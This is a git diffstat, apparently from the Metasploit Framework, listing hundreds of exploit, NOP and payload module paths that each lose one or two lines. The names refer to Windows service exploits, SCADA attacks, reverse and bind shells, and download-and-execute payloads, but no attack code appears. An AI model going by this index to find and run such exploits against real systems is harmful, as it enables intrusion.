modules/exploits/windows/firewall/blackice_pam_icq.rb | 1 - modules/exploits/windows/firewall/kerio_auth.rb | 1 - modules/exploits/windows/ftp/32bitftp_list_reply.rb | 1 - modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 1 - modules/exploits/windows/ftp/aasync_list_reply.rb | 1 - modules/exploits/windows/ftp/cesarftp_mkd.rb | 1 - modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 1 - modules/exploits/windows/ftp/dreamftp_format.rb | 1 - modules/exploits/windows/ftp/easyfilesharing_pass.rb | 1 - modules/exploits/windows/ftp/easyftp_cwd_fixret.rb | 1 - modules/exploits/windows/ftp/easyftp_list_fixret.rb | 1 - modules/exploits/windows/ftp/easyftp_mkd_fixret.rb | 1 - modules/exploits/windows/ftp/filecopa_list_overflow.rb | 1 - modules/exploits/windows/ftp/filewrangler_list_reply.rb | 1 - modules/exploits/windows/ftp/freeftpd_user.rb | 1 - modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb | 1 - modules/exploits/windows/ftp/ftppad_list_reply.rb | 1 - modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb | 1 - modules/exploits/windows/ftp/ftpsynch_list_reply.rb | 1 - modules/exploits/windows/ftp/gekkomgr_list_reply.rb | 1 - modules/exploits/windows/ftp/globalscapeftp_input.rb | 1 - modules/exploits/windows/ftp/goldenftp_pass_bof.rb | 1 - modules/exploits/windows/ftp/httpdx_tolog_format.rb | 1 - modules/exploits/windows/ftp/leapftp_list_reply.rb | 1 - modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 1 - modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb | 1 - modules/exploits/windows/ftp/netterm_netftpd_user.rb | 1 - modules/exploits/windows/ftp/odin_list_reply.rb | 1 - modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 1 - modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb | 1 - modules/exploits/windows/ftp/proftp_banner.rb | 1 - modules/exploits/windows/ftp/sami_ftpd_user.rb | 1 - modules/exploits/windows/ftp/sasser_ftpd_port.rb | 1 - modules/exploits/windows/ftp/scriptftp_list.rb | 1 - modules/exploits/windows/ftp/seagull_list_reply.rb | 1 - modules/exploits/windows/ftp/servu_chmod.rb | 1 - modules/exploits/windows/ftp/servu_mdtm.rb | 1 - modules/exploits/windows/ftp/slimftpd_list_concat.rb | 1 - modules/exploits/windows/ftp/trellian_client_pasv.rb | 1 - modules/exploits/windows/ftp/vermillion_ftpd_port.rb | 1 - modules/exploits/windows/ftp/warftpd_165_pass.rb | 1 - modules/exploits/windows/ftp/warftpd_165_user.rb | 1 - modules/exploits/windows/ftp/wftpd_size.rb | 1 - modules/exploits/windows/ftp/wsftp_server_503_mkd.rb | 1 - modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb | 1 - modules/exploits/windows/ftp/xftp_client_pwd.rb | 1 - modules/exploits/windows/ftp/xlink_client.rb | 1 - modules/exploits/windows/ftp/xlink_server.rb | 1 - modules/exploits/windows/games/mohaa_getinfo.rb | 1 - modules/exploits/windows/games/racer_503beta5.rb | 1 - modules/exploits/windows/games/ut2004_secure.rb | 1 - modules/exploits/windows/http/adobe_robohelper_authbypass.rb | 1 - modules/exploits/windows/http/altn_securitygateway.rb | 1 - modules/exploits/windows/http/altn_webadmin.rb | 1 - modules/exploits/windows/http/amlibweb_webquerydll_app.rb | 1 - modules/exploits/windows/http/apache_chunked.rb | 1 - modules/exploits/windows/http/apache_mod_rewrite_ldap.rb | 1 - modules/exploits/windows/http/apache_modjk_overflow.rb | 1 - modules/exploits/windows/http/badblue_ext_overflow.rb | 1 - modules/exploits/windows/http/badblue_passthru.rb | 1 - modules/exploits/windows/http/bea_weblogic_jsessionid.rb | 1 - modules/exploits/windows/http/bea_weblogic_post_bof.rb | 1 - modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb | 1 - modules/exploits/windows/http/belkin_bulldog.rb | 1 - modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 1 - modules/exploits/windows/http/ca_igateway_debug.rb | 1 - .../exploits/windows/http/ca_totaldefense_regeneratereports.rb | 1 - modules/exploits/windows/http/coldfusion_fckeditor.rb | 1 - modules/exploits/windows/http/easyftp_list.rb | 1 - modules/exploits/windows/http/edirectory_host.rb | 1 - modules/exploits/windows/http/edirectory_imonitor.rb | 1 - modules/exploits/windows/http/efs_easychatserver_username.rb | 1 - modules/exploits/windows/http/fdm_auth_header.rb | 1 - modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb | 1 - modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb | 1 - modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb | 1 - modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 1 - modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 1 - modules/exploits/windows/http/hp_nnm_openview5.rb | 1 - modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb | 1 - modules/exploits/windows/http/hp_nnm_ovas.rb | 2 -- modules/exploits/windows/http/hp_nnm_ovwebhelp.rb | 1 - modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb | 1 - modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb | 1 - modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb | 1 - modules/exploits/windows/http/hp_nnm_snmp.rb | 1 - modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb | 1 - modules/exploits/windows/http/hp_nnm_toolbar_01.rb | 1 - modules/exploits/windows/http/hp_nnm_toolbar_02.rb | 1 - modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb | 1 - modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb | 1 - modules/exploits/windows/http/hp_openview_insight_backdoor.rb | 1 - modules/exploits/windows/http/hp_power_manager_filename.rb | 1 - modules/exploits/windows/http/hp_power_manager_login.rb | 1 - modules/exploits/windows/http/httpdx_handlepeer.rb | 1 - modules/exploits/windows/http/httpdx_tolog_format.rb | 1 - modules/exploits/windows/http/ia_webmail.rb | 1 - modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb | 1 - modules/exploits/windows/http/ibm_tpmfosd_overflow.rb | 1 - modules/exploits/windows/http/ibm_tsm_cad_header.rb | 1 - modules/exploits/windows/http/icecast_header.rb | 1 - modules/exploits/windows/http/integard_password_bof.rb | 1 - modules/exploits/windows/http/intersystems_cache.rb | 1 - modules/exploits/windows/http/ipswitch_wug_maincfgret.rb | 1 - modules/exploits/windows/http/kolibri_http.rb | 1 - .../exploits/windows/http/landesk_thinkmanagement_upload_asp.rb | 1 - modules/exploits/windows/http/mailenable_auth_header.rb | 1 - modules/exploits/windows/http/manageengine_apps_mngr.rb | 1 - modules/exploits/windows/http/maxdb_webdbm_database.rb | 1 - modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb | 1 - modules/exploits/windows/http/mcafee_epolicy_source.rb | 1 - modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb | 1 - modules/exploits/windows/http/minishare_get_overflow.rb | 1 - modules/exploits/windows/http/navicopa_get_overflow.rb | 1 - modules/exploits/windows/http/novell_imanager_upload.rb | 1 - modules/exploits/windows/http/novell_messenger_acceptlang.rb | 1 - modules/exploits/windows/http/nowsms.rb | 1 - modules/exploits/windows/http/oracle9i_xdb_pass.rb | 1 - modules/exploits/windows/http/osb_uname_jlist.rb | 1 - modules/exploits/windows/http/peercast_url.rb | 1 - modules/exploits/windows/http/php_apache_request_headers_bof.rb | 1 - modules/exploits/windows/http/privatewire_gateway.rb | 1 - modules/exploits/windows/http/psoproxy91_overflow.rb | 1 - modules/exploits/windows/http/sambar6_search_results.rb | 1 - modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb | 1 - modules/exploits/windows/http/sapdb_webtools.rb | 1 - modules/exploits/windows/http/savant_31_overflow.rb | 1 - modules/exploits/windows/http/servu_session_cookie.rb | 1 - modules/exploits/windows/http/shoutcast_format.rb | 1 - modules/exploits/windows/http/shttpd_post.rb | 1 - modules/exploits/windows/http/steamcast_useragent.rb | 1 - modules/exploits/windows/http/sybase_easerver.rb | 1 - modules/exploits/windows/http/trackercam_phparg_overflow.rb | 1 - modules/exploits/windows/http/trendmicro_officescan.rb | 1 - modules/exploits/windows/http/webster_http.rb | 1 - modules/exploits/windows/http/xampp_webdav_upload_php.rb | 1 - modules/exploits/windows/http/xitami_if_mod_since.rb | 1 - modules/exploits/windows/http/zenworks_uploadservlet.rb | 1 - modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 1 - modules/exploits/windows/iis/ms01_023_printer.rb | 1 - modules/exploits/windows/iis/ms01_026_dbldecode.rb | 1 - modules/exploits/windows/iis/ms01_033_idq.rb | 1 - modules/exploits/windows/iis/ms02_018_htr.rb | 1 - modules/exploits/windows/iis/ms02_065_msadc.rb | 1 - modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb | 1 - modules/exploits/windows/imap/eudora_list.rb | 1 - modules/exploits/windows/imap/imail_delete.rb | 1 - modules/exploits/windows/imap/ipswitch_search.rb | 1 - modules/exploits/windows/imap/mailenable_login.rb | 1 - modules/exploits/windows/imap/mailenable_status.rb | 1 - modules/exploits/windows/imap/mailenable_w3c_select.rb | 1 - modules/exploits/windows/imap/mdaemon_cram_md5.rb | 1 - modules/exploits/windows/imap/mdaemon_fetch.rb | 1 - modules/exploits/windows/imap/mercur_imap_select_overflow.rb | 1 - modules/exploits/windows/imap/mercur_login.rb | 1 - modules/exploits/windows/imap/mercury_login.rb | 1 - modules/exploits/windows/imap/mercury_rename.rb | 1 - modules/exploits/windows/imap/novell_netmail_append.rb | 1 - modules/exploits/windows/imap/novell_netmail_auth.rb | 1 - modules/exploits/windows/imap/novell_netmail_status.rb | 1 - modules/exploits/windows/imap/novell_netmail_subscribe.rb | 1 - modules/exploits/windows/isapi/ms00_094_pbserver.rb | 1 - modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb | 1 - modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb | 1 - modules/exploits/windows/isapi/rsa_webagent_redirect.rb | 1 - modules/exploits/windows/isapi/w3who_query.rb | 1 - modules/exploits/windows/ldap/imail_thc.rb | 1 - modules/exploits/windows/ldap/pgp_keyserver7.rb | 1 - modules/exploits/windows/license/calicclnt_getconfig.rb | 1 - modules/exploits/windows/license/calicserv_getconfig.rb | 1 - modules/exploits/windows/license/sentinel_lm7_udp.rb | 1 - modules/exploits/windows/local/ask.rb | 1 - modules/exploits/windows/local/bypassuac.rb | 1 - modules/exploits/windows/local/current_user_psexec.rb | 1 - modules/exploits/windows/local/ms10_092_schelevator.rb | 1 - modules/exploits/windows/lotus/domino_http_accept_language.rb | 1 - modules/exploits/windows/lotus/domino_icalendar_organizer.rb | 1 - modules/exploits/windows/lotus/domino_sametime_stmux.rb | 1 - modules/exploits/windows/lotus/lotusnotes_lzh.rb | 1 - modules/exploits/windows/lpd/hummingbird_exceed.rb | 1 - modules/exploits/windows/lpd/niprint.rb | 1 - modules/exploits/windows/lpd/saplpd.rb | 1 - modules/exploits/windows/lpd/wincomlpd_admin.rb | 1 - modules/exploits/windows/misc/agentxpp_receive_agentx.rb | 1 - modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb | 1 - modules/exploits/windows/misc/asus_dpcproxy_overflow.rb | 1 - modules/exploits/windows/misc/bakbone_netvault_heap.rb | 1 - modules/exploits/windows/misc/bcaaa_bof.rb | 1 - modules/exploits/windows/misc/bigant_server.rb | 1 - modules/exploits/windows/misc/bigant_server_250.rb | 1 - modules/exploits/windows/misc/bigant_server_usv.rb | 1 - modules/exploits/windows/misc/bomberclone_overflow.rb | 1 - modules/exploits/windows/misc/bopup_comm.rb | 1 - modules/exploits/windows/misc/borland_interbase.rb | 1 - modules/exploits/windows/misc/borland_starteam.rb | 1 - modules/exploits/windows/misc/citrix_streamprocess.rb | 1 - modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb | 1 - .../misc/citrix_streamprocess_get_boot_record_request.rb | 1 - .../exploits/windows/misc/citrix_streamprocess_get_footer.rb | 1 - .../exploits/windows/misc/citrix_streamprocess_get_objects.rb | 1 - modules/exploits/windows/misc/doubletake.rb | 1 - modules/exploits/windows/misc/eiqnetworks_esa.rb | 1 - modules/exploits/windows/misc/eiqnetworks_esa_topology.rb | 1 - modules/exploits/windows/misc/eureka_mail_err.rb | 1 - modules/exploits/windows/misc/fb_isc_attach_database.rb | 1 - modules/exploits/windows/misc/fb_isc_create_database.rb | 1 - modules/exploits/windows/misc/fb_svc_attach.rb | 1 - modules/exploits/windows/misc/gimp_script_fu.rb | 1 - modules/exploits/windows/misc/hp_dataprotector_new_folder.rb | 1 - modules/exploits/windows/misc/hp_omniinet_1.rb | 1 - modules/exploits/windows/misc/hp_omniinet_2.rb | 1 - modules/exploits/windows/misc/hp_omniinet_3.rb | 1 - modules/exploits/windows/misc/hp_omniinet_4.rb | 1 - modules/exploits/windows/misc/hp_ovtrace.rb | 1 - modules/exploits/windows/misc/ib_isc_attach_database.rb | 1 - modules/exploits/windows/misc/ib_isc_create_database.rb | 1 - modules/exploits/windows/misc/ib_svc_attach.rb | 1 - modules/exploits/windows/misc/ibm_tsm_cad_ping.rb | 1 - modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 1 - modules/exploits/windows/misc/landesk_aolnsrvr.rb | 1 - modules/exploits/windows/misc/mercury_phonebook.rb | 1 - modules/exploits/windows/misc/mini_stream.rb | 1 - modules/exploits/windows/misc/mirc_privmsg_server.rb | 1 - modules/exploits/windows/misc/ms07_064_sami.rb | 1 - modules/exploits/windows/misc/netcat110_nt.rb | 1 - modules/exploits/windows/misc/nettransport.rb | 1 - modules/exploits/windows/misc/poppeeper_date.rb | 1 - modules/exploits/windows/misc/poppeeper_uidl.rb | 1 - modules/exploits/windows/misc/pxexploit.rb | 2 -- modules/exploits/windows/misc/realtek_playlist.rb | 1 - modules/exploits/windows/misc/sap_2005_license.rb | 1 - modules/exploits/windows/misc/shixxnote_font.rb | 1 - modules/exploits/windows/misc/splayer_content_type.rb | 1 - modules/exploits/windows/misc/talkative_response.rb | 1 - modules/exploits/windows/misc/tiny_identd_overflow.rb | 1 - modules/exploits/windows/misc/ufo_ai.rb | 1 - modules/exploits/windows/misc/windows_rsh.rb | 1 - modules/exploits/windows/misc/wireshark_packet_dect.rb | 1 - modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb | 1 - modules/exploits/windows/motorola/timbuktu_fileupload.rb | 1 - modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb | 1 - modules/exploits/windows/mssql/ms02_039_slammer.rb | 1 - modules/exploits/windows/mssql/ms02_056_hello.rb | 1 - modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb | 1 - .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 1 - modules/exploits/windows/mssql/mssql_payload.rb | 1 - modules/exploits/windows/mssql/mssql_payload_sqli.rb | 1 - modules/exploits/windows/mysql/mysql_payload.rb | 1 - modules/exploits/windows/mysql/mysql_yassl_hello.rb | 1 - modules/exploits/windows/nfs/xlink_nfsd.rb | 1 - modules/exploits/windows/nntp/ms05_030_nntp.rb | 1 - modules/exploits/windows/novell/groupwisemessenger_client.rb | 1 - modules/exploits/windows/novell/nmap_stor.rb | 1 - modules/exploits/windows/novell/zenworks_desktop_agent.rb | 1 - modules/exploits/windows/oracle/osb_ndmp_auth.rb | 1 - modules/exploits/windows/oracle/tns_arguments.rb | 1 - modules/exploits/windows/oracle/tns_auth_sesskey.rb | 1 - modules/exploits/windows/oracle/tns_service_name.rb | 1 - modules/exploits/windows/pop3/seattlelab_pass.rb | 1 - modules/exploits/windows/proxy/bluecoat_winproxy_host.rb | 1 - modules/exploits/windows/proxy/ccproxy_telnet_ping.rb | 1 - modules/exploits/windows/proxy/proxypro_http_get.rb | 1 - modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb | 1 - modules/exploits/windows/scada/citect_scada_odbc.rb | 1 - modules/exploits/windows/scada/daq_factory_bof.rb | 2 -- modules/exploits/windows/scada/factorylink_csservice.rb | 1 - modules/exploits/windows/scada/factorylink_vrn_09.rb | 1 - modules/exploits/windows/scada/iconics_genbroker.rb | 1 - modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb | 1 - modules/exploits/windows/scada/igss9_igssdataserver_listall.rb | 1 - modules/exploits/windows/scada/igss9_igssdataserver_rename.rb | 1 - modules/exploits/windows/scada/igss9_misc.rb | 1 - modules/exploits/windows/scada/moxa_mdmtool.rb | 1 - modules/exploits/windows/scada/procyon_core_server.rb | 1 - modules/exploits/windows/scada/realwin.rb | 1 - modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb | 1 - modules/exploits/windows/scada/realwin_on_fcs_login.rb | 1 - modules/exploits/windows/scada/realwin_scpc_initialize.rb | 1 - modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb | 1 - modules/exploits/windows/scada/realwin_scpc_txtevent.rb | 1 - modules/exploits/windows/scada/scadapro_cmdexe.rb | 1 - modules/exploits/windows/scada/winlog_runtime.rb | 1 - modules/exploits/windows/sip/aim_triton_cseq.rb | 1 - modules/exploits/windows/sip/sipxezphone_cseq.rb | 1 - modules/exploits/windows/sip/sipxphone_cseq.rb | 1 - modules/exploits/windows/smb/ms03_049_netapi.rb | 1 - modules/exploits/windows/smb/ms04_007_killbill.rb | 1 - modules/exploits/windows/smb/ms04_011_lsass.rb | 1 - modules/exploits/windows/smb/ms04_031_netdde.rb | 1 - modules/exploits/windows/smb/ms05_039_pnp.rb | 1 - modules/exploits/windows/smb/ms06_025_rasmans_reg.rb | 1 - modules/exploits/windows/smb/ms06_025_rras.rb | 1 - modules/exploits/windows/smb/ms06_040_netapi.rb | 1 - modules/exploits/windows/smb/ms06_066_nwapi.rb | 1 - modules/exploits/windows/smb/ms06_066_nwwks.rb | 1 - modules/exploits/windows/smb/ms06_070_wkssvc.rb | 1 - modules/exploits/windows/smb/ms07_029_msdns_zonename.rb | 1 - modules/exploits/windows/smb/ms08_067_netapi.rb | 1 - .../exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb | 1 - modules/exploits/windows/smb/ms10_061_spoolss.rb | 1 - modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb | 1 - modules/exploits/windows/smb/psexec.rb | 1 - modules/exploits/windows/smb/smb_relay.rb | 1 - modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb | 1 - modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 1 - modules/exploits/windows/smtp/mercury_cram_md5.rb | 1 - modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb | 1 - modules/exploits/windows/smtp/njstar_smtp_bof.rb | 1 - modules/exploits/windows/smtp/wmailserver.rb | 1 - modules/exploits/windows/smtp/ypops_overflow1.rb | 1 - modules/exploits/windows/ssh/freeftpd_key_exchange.rb | 1 - modules/exploits/windows/ssh/freesshd_key_exchange.rb | 1 - modules/exploits/windows/ssh/putty_msg_debug.rb | 1 - modules/exploits/windows/ssh/securecrt_ssh1.rb | 1 - modules/exploits/windows/ssl/ms04_011_pct.rb | 1 - modules/exploits/windows/telnet/gamsoft_telsrv_username.rb | 1 - modules/exploits/windows/telnet/goodtech_telnet.rb | 1 - modules/exploits/windows/tftp/attftp_long_filename.rb | 1 - modules/exploits/windows/tftp/dlink_long_filename.rb | 1 - modules/exploits/windows/tftp/futuresoft_transfermode.rb | 1 - modules/exploits/windows/tftp/quick_tftp_pro_mode.rb | 1 - modules/exploits/windows/tftp/tftpd32_long_filename.rb | 1 - modules/exploits/windows/tftp/tftpdwin_long_filename.rb | 1 - modules/exploits/windows/tftp/threectftpsvc_long_mode.rb | 1 - modules/exploits/windows/unicenter/cam_log_security.rb | 1 - modules/exploits/windows/vnc/realvnc_client.rb | 1 - modules/exploits/windows/vnc/ultravnc_client.rb | 1 - modules/exploits/windows/vnc/ultravnc_viewer_bof.rb | 1 - modules/exploits/windows/vnc/winvnc_http_get.rb | 1 - modules/exploits/windows/vpn/safenet_ike_11.rb | 1 - modules/exploits/windows/wins/ms04_045_wins.rb | 1 - modules/nops/armle/simple.rb | 1 - modules/nops/php/generic.rb | 1 - modules/nops/ppc/simple.rb | 1 - modules/nops/sparc/random.rb | 1 - modules/nops/tty/generic.rb | 1 - modules/nops/x64/simple.rb | 1 - modules/nops/x86/opty2.rb | 1 - modules/nops/x86/single_byte.rb | 1 - modules/payloads/singles/aix/ppc/shell_bind_tcp.rb | 1 - modules/payloads/singles/aix/ppc/shell_find_port.rb | 1 - modules/payloads/singles/aix/ppc/shell_interact.rb | 1 - modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb | 1 - modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb | 1 - modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb | 1 - modules/payloads/singles/bsd/x86/exec.rb | 2 -- modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb | 1 - modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb | 1 - modules/payloads/singles/bsd/x86/shell_bind_tcp.rb | 1 - modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb | 1 - modules/payloads/singles/bsd/x86/shell_find_port.rb | 1 - modules/payloads/singles/bsd/x86/shell_find_tag.rb | 1 - modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb | 1 - modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 1 - modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb | 1 - modules/payloads/singles/bsdi/x86/shell_find_port.rb | 1 - modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb | 1 - modules/payloads/singles/cmd/unix/bind_inetd.rb | 1 - modules/payloads/singles/cmd/unix/bind_netcat.rb | 1 - modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb | 1 - modules/payloads/singles/cmd/unix/bind_perl.rb | 1 - modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb | 1 - modules/payloads/singles/cmd/unix/bind_ruby.rb | 1 - modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb | 1 - modules/payloads/singles/cmd/unix/generic.rb | 1 - modules/payloads/singles/cmd/unix/interact.rb | 1 - modules/payloads/singles/cmd/unix/reverse.rb | 1 - modules/payloads/singles/cmd/unix/reverse_bash.rb | 1 - modules/payloads/singles/cmd/unix/reverse_netcat.rb | 1 - modules/payloads/singles/cmd/unix/reverse_perl.rb | 1 - modules/payloads/singles/cmd/unix/reverse_ruby.rb | 1 - modules/payloads/singles/cmd/windows/adduser.rb | 1 - modules/payloads/singles/cmd/windows/bind_perl.rb | 1 - modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb | 1 - modules/payloads/singles/cmd/windows/bind_ruby.rb | 1 - modules/payloads/singles/cmd/windows/download_eval_vbs.rb | 1 - modules/payloads/singles/cmd/windows/download_exec_vbs.rb | 1 - modules/payloads/singles/cmd/windows/reverse_perl.rb | 1 - modules/payloads/singles/cmd/windows/reverse_ruby.rb | 1 - modules/payloads/singles/generic/custom.rb | 1 - modules/payloads/singles/generic/debug_trap.rb | 1 - modules/payloads/singles/generic/shell_bind_tcp.rb | 1 - modules/payloads/singles/generic/shell_reverse_tcp.rb | 1 - modules/payloads/singles/generic/tight_loop.rb | 1 - modules/payloads/singles/java/jsp_shell_bind_tcp.rb | 1 - modules/payloads/singles/java/jsp_shell_reverse_tcp.rb | 1 - modules/payloads/singles/java/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/armle/adduser.rb | 1 - modules/payloads/singles/linux/armle/exec.rb | 1 - modules/payloads/singles/linux/armle/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/ppc/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/ppc/shell_find_port.rb | 1 - modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/ppc64/shell_find_port.rb | 1 - modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/x64/exec.rb | 1 - modules/payloads/singles/linux/x64/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/x64/shell_find_port.rb | 1 - modules/payloads/singles/linux/x64/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/x86/adduser.rb | 1 - modules/payloads/singles/linux/x86/chmod.rb | 1 - modules/payloads/singles/linux/x86/exec.rb | 1 - modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb | 1 - modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb | 1 - modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb | 1 - modules/payloads/singles/linux/x86/shell_bind_tcp.rb | 1 - modules/payloads/singles/linux/x86/shell_find_port.rb | 1 - modules/payloads/singles/linux/x86/shell_find_tag.rb | 1 - modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 1 - modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb | 1 - modules/payloads/singles/osx/armle/shell_bind_tcp.rb | 1 - modules/payloads/singles/osx/armle/shell_reverse_tcp.rb | 1 - modules/payloads/singles/osx/armle/vibrate.rb | 1 - modules/payloads/singles/osx/ppc/shell_bind_tcp.rb | 1 - modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb | 1 - modules/payloads/singles/osx/x64/exec.rb | 1 - modules/payloads/singles/osx/x64/say.rb | 1 - modules/payloads/singles/osx/x64/shell_find_tag.rb | 1 - modules/payloads/singles/osx/x86/exec.rb | 1 - modules/payloads/singles/osx/x86/shell_bind_tcp.rb | 1 - modules/payloads/singles/osx/x86/shell_find_port.rb | 1 - modules/payloads/singles/osx/x86/shell_reverse_tcp.rb | 1 - modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb | 1 - modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb | 1 - modules/payloads/singles/php/bind_perl.rb | 1 - modules/payloads/singles/php/bind_perl_ipv6.rb | 1 - modules/payloads/singles/php/bind_php.rb | 1 - modules/payloads/singles/php/bind_php_ipv6.rb | 1 - modules/payloads/singles/php/download_exec.rb | 1 - modules/payloads/singles/php/exec.rb | 1 - modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 1 - modules/payloads/singles/php/reverse_perl.rb | 1 - modules/payloads/singles/php/reverse_php.rb | 1 - modules/payloads/singles/php/shell_findsock.rb | 1 - modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb | 1 - modules/payloads/singles/solaris/sparc/shell_find_port.rb | 1 - modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb | 1 - modules/payloads/singles/solaris/x86/shell_bind_tcp.rb | 1 - modules/payloads/singles/solaris/x86/shell_find_port.rb | 1 - modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb | 1 - modules/payloads/singles/tty/unix/interact.rb | 1 - modules/payloads/singles/windows/adduser.rb | 1 - modules/payloads/singles/windows/dns_txt_query_exec.rb | 1 - modules/payloads/singles/windows/download_exec.rb | 1 - modules/payloads/singles/windows/exec.rb | 1 - modules/payloads/singles/windows/loadlibrary.rb | 1 - modules/payloads/singles/windows/messagebox.rb | 1 - modules/payloads/singles/windows/metsvc_bind_tcp.rb | 1 - modules/payloads/singles/windows/metsvc_reverse_tcp.rb | 1 - modules/payloads/singles/windows/shell_bind_tcp.rb | 1 - modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb | 1 - modules/payloads/singles/windows/shell_reverse_tcp.rb | 1 - modules/payloads/singles/windows/speak_pwned.rb | 1 - modules/payloads/singles/windows/x64/exec.rb | 1 - modules/payloads/singles/windows/x64/loadlibrary.rb | 1 - modules/payloads/singles/windows/x64/shell_bind_tcp.rb | 1 - modules/payloads/singles/windows/x64/shell_reverse_tcp.rb | 1 - modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb | 1 - modules/payloads/stagers/bsd/x86/bind_tcp.rb | 1 - modules/payloads/stagers/bsd/x86/find_tag.rb | 1 - modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb | 1 - modules/payloads/stagers/bsd/x86/reverse_tcp.rb | 1 - modules/payloads/stagers/bsdi/x86/bind_tcp.rb | 1 - modules/payloads/stagers/bsdi/x86/reverse_tcp.rb | 1 - modules/payloads/stagers/java/bind_tcp.rb | 1 - modules/payloads/stagers/java/reverse_http.rb | 1 - modules/payloads/stagers/java/reverse_https.rb | 1 - modules/payloads/stagers/java/reverse_tcp.rb | 1 - modules/payloads/stagers/linux/x64/bind_tcp.rb | 1 - modules/payloads/stagers/linux/x64/reverse_tcp.rb | 1 - modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb | 1 - modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb | 1 - modules/payloads/stagers/linux/x86/bind_tcp.rb | 1 - modules/payloads/stagers/linux/x86/find_tag.rb | 1 - modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb | 1 - modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb | 1 - modules/payloads/stagers/linux/x86/reverse_tcp.rb | 1 - modules/payloads/stagers/netware/reverse_tcp.rb | 1 - modules/payloads/stagers/osx/armle/bind_tcp.rb | 1 - modules/payloads/stagers/osx/armle/reverse_tcp.rb | 1 - modules/payloads/stagers/osx/ppc/bind_tcp.rb | 1 - modules/payloads/stagers/osx/ppc/find_tag.rb | 1 - modules/payloads/stagers/osx/ppc/reverse_tcp.rb | 1 - 